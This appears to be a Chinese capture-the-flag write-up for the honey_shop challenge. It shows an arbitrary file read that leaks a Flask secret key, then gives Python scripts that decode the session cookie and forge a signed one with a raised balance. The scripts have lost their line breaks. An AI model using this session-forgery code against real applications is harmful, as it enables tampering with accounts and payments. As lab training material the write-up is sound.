BUU [PASECA2019]honey_shop

技术栈：任意文件读取、session伪造

开启靶机，我有1336金币，买flag需要1337金币

点击上面的大图，会直接下载图片

抓包看看，感觉是任意文件读取

修改下路径读一下

读到了session密钥是Kv8iQMoBRn0zhY6rgfcXSSbzNJVeY7KfbgsVmVa6

现有session解密看看，发现了金额在里面，就是说我们伪造了session，修改了金额就行。

脚本贴一下：

import base64
import json
import zlibdef decode_flask_cookie(cookie):def base64_decode(input):# 修复Base64字符串长度input += '=' * (-len(input) % 4)return base64.urlsafe_b64decode(input)# 将cookie分成数据部分和签名部分encoded_data = cookie.split('.')[0]# 解码Base64数据data = base64_decode(encoded_data)try:# 尝试解压缩数据data = zlib.decompress(data)except zlib.error:pass  # 如果数据没有压缩，则跳过try:# 尝试解码为UTF-8字符串data = data.decode('utf-8')except UnicodeDecodeError:raise ValueError("Failed to decode session data as UTF-8 string")return json.loads(data)# 示例用法
cookie = "eyJiYWxhbmNlIjoxMzM2LCJwdXJjaGFzZXMiOltdfQ.Zo11Hg.Q7xIJmOPmhsabu4gXmoppnLG9J8"try:decoded_data = decode_flask_cookie(cookie)print(json.dumps(decoded_data, indent=4))
except ValueError as e:print("Error decoding session data", )

拿密钥加密一下，脚本也贴下：

from flask.sessions import SecureCookieSessionInterface
import astclass MockApp(object):def __init__(self, secret_key):self.secret_key = secret_keydef encrypt_flask_session(secret_key, session_data):"""加密Flask会话数据"""try:app = MockApp(secret_key)session_data = dict(ast.literal_eval(session_data))si = SecureCookieSessionInterface()s = si.get_signing_serializer(app)return s.dumps(session_data)except Exception as e:raise Exception(f"[Encoding error] {e}")# 示例用法
session_data = "{'balance': 1339, 'purchases': []}"
secret_key = "Kv8iQMoBRn0zhY6rgfcXSSbzNJVeY7KfbgsVmVa6"  # 替换为Flask应用的实际SECRET_KEYtry:encrypted_cookie = encrypt_flask_session(secret_key, session_data)print(encrypted_cookie)
except Exception as e:print(e)